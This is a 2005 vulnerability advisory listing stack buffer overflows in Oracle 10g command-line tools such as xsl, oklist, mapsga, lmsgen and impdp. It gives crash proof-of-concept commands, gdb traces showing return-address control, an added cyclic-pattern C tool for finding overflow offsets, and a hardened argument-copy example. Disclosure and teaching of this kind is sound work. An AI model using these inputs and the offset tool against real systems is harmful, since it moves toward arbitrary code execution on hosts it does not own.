Various Buffer Overflows in Oracle 10g Tools

From: Joxean Koret (joxeankoret_at_yahoo.es)
Date: 01/20/05

    To: Security Tracker <bugs@securitytracker.com>, Secunia <vuln@secunia.com>, bugtraq@securityfocus.com, siaaypee@euskalnet.net
    Date: Thu, 20 Jan 2005 22:04:33 +0000
    
    
    

    ---------------------------------------------------------------------------
               Various Buffer Overflows in Oracle 10g Tools
    ---------------------------------------------------------------------------

    Author: Jose Antonio Coret (Joxean Koret)
    Date: 2004, 2005
    Location: Basque Country

    ---------------------------------------------------------------------------

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Oracle10g - Version 10.1.0.3.0

    Web : http://www.oracle.com

    ---------------------------------------------------------------------------

    Vulnerability List:
    ~~~~~~~~~~~~~~~~~~~

    A.- Oracle XML Developers Kit 10.1.0.3.0 - Production
    B.- Kerberos Utilities: Version 10.1.0.3.0 - Production
    C.- Configuration tool for Oracle Cluster Registry
    D.- NMUCT Program
    E.- MAPSGA - A utility to dump the SGA
    F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production
    G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production
    H.- IMPDP and EXPDP: Release 10.1.0.3.0 - Production
    I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~

    A.- Oracle XML Developers Kit 10.1.0.3.0 - Production

    A1. BOF in stylesheet argument

    The Oracle10g Database Server XSL processor tool (xsl) is vulnerable to
    stack-based buffer overflows in its command-line arguments (-B and -f
    are shown below). This may allow arbitrary code execution.

    A2. Samples

    joxean@nemobox:/data/oracle/bin$ ./xsl -B a `perl -e 'print "a"x2272;'` oracle
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./xsl -f `perl -e 'print "a"x2272;'` oracle
    Segmentation fault

    NOTE: The argument must be at least 2272 characters long (the samples
    use exactly 2272).

    joxean@nemobox:/data/oracle/bin$ gdb ./xsl
    (bla, bla, bla...)
    This GDB was configured as "i386-linux"...Using host libthread_db
    library "/lib/libthread_db.so.1".

    (gdb) run -B a `perl -e 'print "a"x2272;'` oracle
    Starting program: /data/oracle/bin/xsl -B a `perl -e 'print "a"x2272;'` oracle
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 8457)]

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 8457)]
    0x61616161 in ?? ()
    (gdb) print $ebp
    $1 = (void *) 0x61616161
    (gdb) print $ebp+4
    $2 = (void *) 0x61616165
    (gdb) quit
    The program is running. Exit anyway? (y or n) y
    joxean@nemobox:/data/oracle/bin$

    Both the saved frame pointer (EBP) and the return address have been
    overwritten with 0x61616161, four 'a' bytes from the argument, and the
    program faults trying to execute at that address: EIP is fully under
    the attacker's control.
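    A run of identical bytes, as in the 'a'x2272 sample above, proves that
    EIP is controlled but does not tell you which four bytes of the
    argument landed there. The usual answer is a cyclic pattern whose every
    4-byte window is unique, so the value gdb prints can be mapped straight
    back to an offset. The helper below is an added example and is not part
    of the advisory or of any Oracle tool; it follows the Metasploit
    pattern_create layout (Aa0Aa1...), and no offset for any Oracle binary
    is assumed.

```c
/* Cyclic-pattern helper for locating the return-address offset in an
 * argv overflow such as the xsl case above.  Added example; not part of
 * the original advisory.  The pattern layout (Aa0Aa1...Zz9) follows the
 * Metasploit pattern_create convention; no offsets for any Oracle binary
 * are assumed here. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill out[0..len) with the repeating "Aa0Aa1...Zz9" sequence.  Every
 * 4-byte window is unique within the first 20280 bytes, so the value
 * that lands in EIP identifies its position in the argument. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { (char)u, (char)l, (char)d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    return n;
}

/* The 4 bytes at `off` of a pattern of length `len`, read the way x86
 * reads a little-endian 32-bit word (what gdb prints for $eip / $ebp).
 * Returns 0 if the window does not fit inside the pattern. */
uint32_t pattern_value_at(size_t off, size_t len)
{
    char *pat = malloc(len);
    if (!pat || pattern_create(pat, len) < off + 4) {
        free(pat);
        return 0;
    }
    const unsigned char *p = (const unsigned char *)pat + off;
    uint32_t v = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    free(pat);
    return v;
}

/* Inverse: given the faulting value from gdb, return the offset of those
 * bytes inside a pattern of length `len`, or -1 if it does not occur
 * (0x61616161 from the 'a'x2272 argument, for instance, never matches). */
long pattern_offset(uint32_t reg_value, size_t len)
{
    unsigned char needle[4] = {
        (unsigned char)(reg_value & 0xff),
        (unsigned char)((reg_value >> 8) & 0xff),
        (unsigned char)((reg_value >> 16) & 0xff),
        (unsigned char)((reg_value >> 24) & 0xff)
    };
    char *pat = malloc(len);
    if (!pat)
        return -1;
    size_t n = pattern_create(pat, len);
    long found = -1;
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) {
            found = (long)i;
            break;
        }
    free(pat);
    return found;
}

/* Usage:  ./pattern 2272           -> prints a 2272-byte pattern for argv
 *         ./pattern -q 0x41306141  -> prints the offset of that EIP value */
int main(int argc, char **argv)
{
    if (argc == 3 && strcmp(argv[1], "-q") == 0) {
        uint32_t v = (uint32_t)strtoul(argv[2], NULL, 0);
        printf("%ld\n", pattern_offset(v, 20280));
        return 0;
    }
    if (argc == 2) {
        size_t len = (size_t)strtoul(argv[1], NULL, 10);
        char *pat = malloc(len + 1);
        if (!pat)
            return 1;
        pat[pattern_create(pat, len)] = '\0';
        fputs(pat, stdout);
        free(pat);
        return 0;
    }
    fprintf(stderr, "usage: %s <length> | -q <hex value>\n", argv[0]);
    return 2;
}
```

    With the xsl case this replaces the perl one-liner: run
    `./xsl -B a "$(./pattern 2272)" oracle` under gdb, read the faulting
    `$eip`, and feed it to `./pattern -q` to get the exact offset at which
    the return address sits in the argument.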

    B.- Kerberos Utilities: Version 10.1.0.3.0 - Production

    B1. BOF in cachename parameter

    The Oracle10g Database Server Kerberos Utilities (oklist and okdstry)
    are vulnerable to buffer overflows in the -c (cache name) parameter.
    This may allow arbitrary code execution.

    B2. Samples

    joxean@nemobox:/data/oracle/bin$ ./oklist -c `perl -e 'print "a"x300;'`
    Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on
    11-NOV-2004 18:52:28
    Copyright (c) 1996, 2002 Oracle. All rights reserved.

    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ ./okdstry -c `perl -e 'print "x"x6000;'`
    Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on
    11-NOV-2004 18:59:59
    Copyright (c) 1996, 2002 Oracle. All rights reserved.

    Segmentation fault

    C.- Configuration tool for Oracle Cluster Registry

    C1. Upgrade argument Buffer Overflow

    The Oracle10g Database Server OCRCONFIG tool is vulnerable to a buffer
    overflow in its first argument. This may allow arbitrary code
    execution.

    C2. Sample

    joxean@nemobox:/data/oracle/bin$ ./ocrconfig `perl -e 'print "a"x6000;'`
    Segmentation fault

    D.- NMUCT Program

    D1. NMUCT???

    I don't know what purpose this Oracle10g tool serves (?), but it is
    vulnerable to buffer overflows (in any parameter!).

    D2. Samples

    joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'`
    `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print
    "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'`
    Now in main ....
    Segmentation fault

    Next tests :

    joxean@nemobox:/data/oracle/bin$ ./nmuct a a a a `perl -e 'print "a"x6000;'` a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct a a a `perl -e 'print "a"x6000;'` a a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct a a `perl -e 'print "a"x6000;'` a a a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct a `perl -e 'print "a"x6000;'` a a a a
    Now in main ....
    Segmentation fault
    joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'` a a a a a
    Now in main ....
    Segmentation fault

    Each of the first five positional arguments tested above overflows on
    its own; almost any argument to this program is vulnerable to BOFs.

    E.- MAPSGA - A utility to dump the SGA

    E1. BOF at the first argument

    The Oracle10g Database Server MAPSGA tool is vulnerable to a buffer
    overflow in its first argument. This may allow arbitrary code
    execution.

    E2. Sample(s)

    joxean@nemobox:/data/oracle/bin$ ./mapsga `perl -e 'print "a"x60000;'`
    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ gdb mapsga
    (more bla, bla, bla...)
    This GDB was configured as "i386-linux"...Using host libthread_db
    library "/lib/libthread_db.so.1".

    (gdb) run `perl -e 'print "x"x6000;'`
    Starting program: /data/oracle/bin/mapsga `perl -e 'print "x"x6000;'`
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 28581)]

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 28581)]
    0x41044390 in getenv () from /lib/libc.so.6
    (gdb) print $ebp
    $1 = (void *) 0xbfffd9f4
    (gdb) print $ebp+4
    $2 = (void *) 0xbfffd9f8
    (gdb) quit
    The program is running. Exit anyway? (y or n) y

    Note that, unlike the xsl case, this trace does not yet show control of
    the return address: the fault is inside getenv() and EBP still holds a
    sane stack address (0xbfffd9f4), so the overflow corrupted something a
    later getenv() call reads before the vulnerable function returned. A
    shorter argument that lets that function return would be needed to
    confirm EIP control.

    F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production

    F1. Another BOF

    The Oracle10g Database Server NLS Data Installation Utility (lxinst) is
    vulnerable to a buffer overflow in its first argument. This may allow
    arbitrary code execution.

    F2. Samples

    joxean@nemobox:/data/oracle/bin$ ./lxinst `perl -e 'print "x"x6000;'`

    NLS Data Installation Utility: Version 10.1.0.3.0 - Production
    Copyright (c) Oracle 1993, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ gdb lxinst
    (And more bla, bla, bla...)
    This GDB was configured as "i386-linux"...Using host libthread_db
    library "/lib/libthread_db.so.1".

    (gdb) run `perl -e 'print "x"x6000;'`
    Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x6000;'`
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 29664)]

    NLS Data Installation Utility: Version 10.1.0.3.0 - Production

    Copyright (c) Oracle 1993, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 29664)]
    0x4109045d in mempcpy () from /lib/libc.so.6
    (gdb) run `perl -e 'print "x"x60000;'`
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x60000;'`
    [Thread debugging using libthread_db enabled]
    [New Thread 16384 (LWP 29696)]

    NLS Data Installation Utility: Version 10.1.0.3.0 - Production

    Copyright (c) Oracle 1993, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 16384 (LWP 29696)]
    0x4109045d in mempcpy () from /lib/libc.so.6

    Both runs fault inside mempcpy() itself, i.e. during the copy, so the
    copying function never returns and neither trace shows whether the
    return address is reachable. An argument longer than the buffer but
    short enough for the copy to complete would be needed to test that.

    G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production

    G1. Another BOF :)

    The Oracle10g NLS Binary Message File Generation Utility (lmsgen) is
    vulnerable to buffer overflows. This may allow arbitrary code
    execution.

    G2. Samples

    joxean@nemobox:/data/oracle/bin$ ./lmsgen `perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'`

    NLS Binary Message File Generation Utility: Version 10.1.0.3.0 -
    Production

    Copyright (c) Oracle 1979, 2004. All rights reserved.

    CORE 10.1.0.3.0 Production

    Input file name too long:
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    (...)
    Can't open message file
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
    Incorrect number of arguments specified!

    Syntax:
    LMSGEN <text file> <product> <facility> [language] [-i indir] [-o outdir]

    Where <text file> is a message text file
          <product> the name of the product
          <facility> the name of the facility
          [language] optional message language in
                      <language>_<territory>.<character set> format
                      This is required if message file is not tagged properly
                      with language
          [-i indir] optional directory where to locate the text file
          [-o outdir] optional directory where to put the generated binary file.
    Segmentation fault

    Another easy test: lmsgen `perl -e 'print "x"x6000;'` a a
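    lmsgen is instructive: it prints "Input file name too long", so a
    length check does exist, yet the process still segfaults, because the
    check guards one code path while another copies an argument unchecked.
    The C below is an added example and is not Oracle's code nor a claim
    about the exact bug in lmsgen; it puts the unbounded-copy pattern this
    advisory reports next to a hardened form that bounds-checks every
    argument before anything is copied. The 256-byte limit and the
    constructed argv are arbitrary choices for the demonstration.

```c
/* Unbounded argv copy beside its hardened form.  Added example; not
 * Oracle's code and not a claim about the exact bug in lmsgen or any
 * other tool in the advisory.  ARG_MAX_LEN is an arbitrary choice. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_MAX_LEN 256

/* The bug class reported above: the argument goes into a fixed stack
 * buffer with no length check, so anything longer than the buffer
 * overwrites the saved EBP and the return address.  Kept only for
 * comparison; it is never called by the checked code path below. */
void copy_arg_unsafe(const char *arg)
{
    char buf[ARG_MAX_LEN];
    strcpy(buf, arg);              /* unbounded copy: the overflow */
    printf("using %s\n", buf);
}

/* Length of s, but never scanning further than max bytes (a bounded
 * strlen, written out so the example does not depend on strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened form: measure first, refuse before copying, always terminate.
 * Returns 0 on success, -1 if the argument would not fit.  Refusing is
 * deliberate; silently truncating a path or name is its own bug. */
int copy_arg_checked(char *dst, size_t dstlen, const char *src)
{
    size_t n = bounded_len(src, dstlen);
    if (n >= dstlen)
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Check every argument up front, not just the one the help text names
 * (the lmsgen output shows a check on the file name only).  Returns the
 * index of the first argument of maxlen bytes or more, or -1 if all fit. */
int first_overlong_arg(int argc, char **argv, size_t maxlen)
{
    for (int i = 1; i < argc; i++)
        if (bounded_len(argv[i], maxlen) >= maxlen)
            return i;
    return -1;
}

/* Demo on a constructed argv {"lmsgen", "a", <n bytes of 'a'>, "a"}:
 * returns what first_overlong_arg reports for that command line. */
int demo_with_arg_len(size_t n)
{
    char *big = malloc(n + 1);
    if (!big)
        return -2;
    memset(big, 'a', n);
    big[n] = '\0';
    char *argv[] = { "lmsgen", "a", big, "a" };
    int r = first_overlong_arg(4, argv, ARG_MAX_LEN);
    free(big);
    return r;
}

/* Demo of the checked copy into an ARG_MAX_LEN buffer. */
int demo_copy(const char *s)
{
    char buf[ARG_MAX_LEN];
    return copy_arg_checked(buf, sizeof buf, s);
}

int main(int argc, char **argv)
{
    int bad = first_overlong_arg(argc, argv, ARG_MAX_LEN);
    if (bad != -1) {
        fprintf(stderr, "argument %d too long (limit %d bytes)\n",
                bad, ARG_MAX_LEN - 1);
        return 2;
    }
    char buf[ARG_MAX_LEN];
    for (int i = 1; i < argc; i++) {
        if (copy_arg_checked(buf, sizeof buf, argv[i]) != 0)
            return 2;              /* cannot happen after the check above */
        printf("arg %d ok: %s\n", i, buf);
    }
    return 0;
}
```

    Running the hardened binary with the same `perl -e 'print "x"x6000;'`
    argument exits with a diagnostic instead of a segmentation fault,
    whichever position the long argument is in.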

    H.- IMPDP and EXPDP: Release 10.1.0.3.0 - Production

    H1. Buffer overflow in EXPDP and IMPDP tools

    The Oracle10g Database Server Data Pump Import and Export tools (impdp
    and expdp) are vulnerable to buffer overflows in their first argument.
    This may allow arbitrary code execution.

    H2. Samples

    joxean@nemobox:/data/oracle/bin$ ./impdp `perl -e 'print "a"x60000;'`
    Segmentation fault

    joxean@nemobox:/data/oracle/bin$ ./expdp `perl -e 'print "x"x5000;'`

    Export: Release 10.1.0.3.0 - Production on Thursday, 11 November, 2004
    20:27

    Copyright (c) 2003, Oracle. All rights reserved.
    Segmentation fault

    I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00

    I1. Another BOF

    The Oracle10g Database Server Genezi tool is vulnerable to a buffer
    overflow in the -c parameter. This may allow arbitrary code execution.

    I2. Samples

    joxean@nemobox:/data/oracle/bin$ ./genezi -c `perl -e 'print "x"x5000;'`
    Segmentation fault

    The fix:
    ~~~~~~~~

    Oracle has released patches for these and other issues. The patches
    are available for download from the MetaLink site at
    http://metalink.oracle.com

    Disclaimer:
    ~~~~~~~~~~~

    The information in this advisory and any of its demonstrations is
    provided "as is" without any warranty of any kind.

    I am not liable for any direct or indirect damages caused as a result of
    using the information or demonstrations provided in any part of this
    advisory.

    ---------------------------------------------------------------------------

    Contact:
    ~~~~~~~~

            Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

    
    


